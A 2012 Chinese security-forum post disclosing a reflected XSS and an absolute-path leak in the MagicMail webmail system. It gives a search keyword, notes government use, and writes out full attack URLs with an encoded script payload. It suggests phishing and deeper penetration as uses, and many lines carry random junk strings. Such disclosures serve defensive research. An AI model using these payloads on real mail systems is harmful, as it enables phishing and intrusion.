找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1879|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞4 ~0 m" W# R/ t6 a0 R
: ~. }# m$ i" {
: W" }  J' `! c2 m1 B
包含  一个反射性XSS  以及  绝对路径泄漏
9 I* H! K% p" A* G看了看 貌似全部是linux的。7 U' j: E8 S  B; Z! {
0 D: C1 b: D$ w" H. a& e
关键字:迈捷邮件系统 by MagicMail. p8 Z$ W- e+ J  X$ @& j8 ]
, u# v7 K. Y" |+ W4 V  L& F% K
可以看到很多政府网站都用这个邮件系统1 C4 E# X+ _( c0 D+ r

2 _/ k: n: u2 S) U) y; D绝对路径 http://madman.in/index.php?login_type=declare&language=+ I% C- w/ w7 t6 X3 z% R

4 G# @) M6 n1 R$ A+ I: I. s" ?7 K# {, t/ _2 b! p
" B( H8 I' d' u! A9 n( u
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
# @2 Y2 ~, T, k& X/ _5 M, L/ C
* H) P; P" p" W9 v4 C# J) C& V! k2 n
( t  q2 m/ i2 x6 x8 A9 T1 x8 z4 V
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等' ^3 J+ `0 R# j0 o9 g/ `

- O: h( |1 P: r, x修复方案:看官方补丁吧。
0 K1 o0 r6 q% a0 L8 u5 E/ \2 J# w: B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表